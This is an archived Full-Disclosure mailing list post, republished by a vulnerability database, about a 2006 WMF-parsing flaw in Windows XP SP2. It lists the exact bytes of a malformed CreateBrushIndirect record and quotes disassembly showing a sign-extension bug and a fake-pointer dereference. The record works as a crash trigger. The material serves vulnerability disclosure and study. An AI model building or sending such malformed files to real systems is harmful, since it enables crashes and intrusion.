Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13763
HistoryAug 07, 2006 - 12:00 a.m.

[Full-disclosure] 0-day XP SP2 wmf exploit (some details)

2006-08-0700:00:00
vulners.com
6

There is some details for wannabees :)

  1. 'Bad' wmf record:

07 00 00 00

length of record (in words)

FC 02

type (CreateBrushIndirect)

08 00 00 00 00 00 00 80

'packed' (good old Win16 days) LOGBRUSH data:

08 00 - 'packed' lpStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
00 00 00 00 - COLORREF (any)
00 80 - 'packed' lbHatch (any, signed)

  1. Sign extension bug:

    _CommonEnumMetaFile:

    ; normalize 'packed' LOGBRUSH
    movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16))
    mov [ebp-0f8], eax
    mov eax, [ebx + 8] ; COLORREF (as is)
    mov [ebp-0f4], eax
    movsx eax, word ptr [ebx+0c] ; <– BUGBUG: lbHatch (UINT32(INT16))
    lea eax, [ebp-0f8]
    push eax
    call _CreateBrushIndirect

  2. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:

    cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle
    jz _go2crush

    cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle
    jz _go2crush

    _go2crush:
    push esi
    push 1
    push eax, [ebp+10]
    push eax
    push dword ptr [ebp+0c] ; 1
    push dword ptr [ebp+18] ; lpHatch (fake *packedDIB)
    call _pbmiConvertInfo


    _pbmiConvertInfo:

    push ebx
    mov ebx, [ebp+8] ; lpHatch (fake *packedDIB)

    mov eax, [ebx] ; <– BUGBUG: crush or random (in first 0x7f00 bytes)
    ; memory access (see @ 0x3000 region)

good luck,
cyanid-E


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/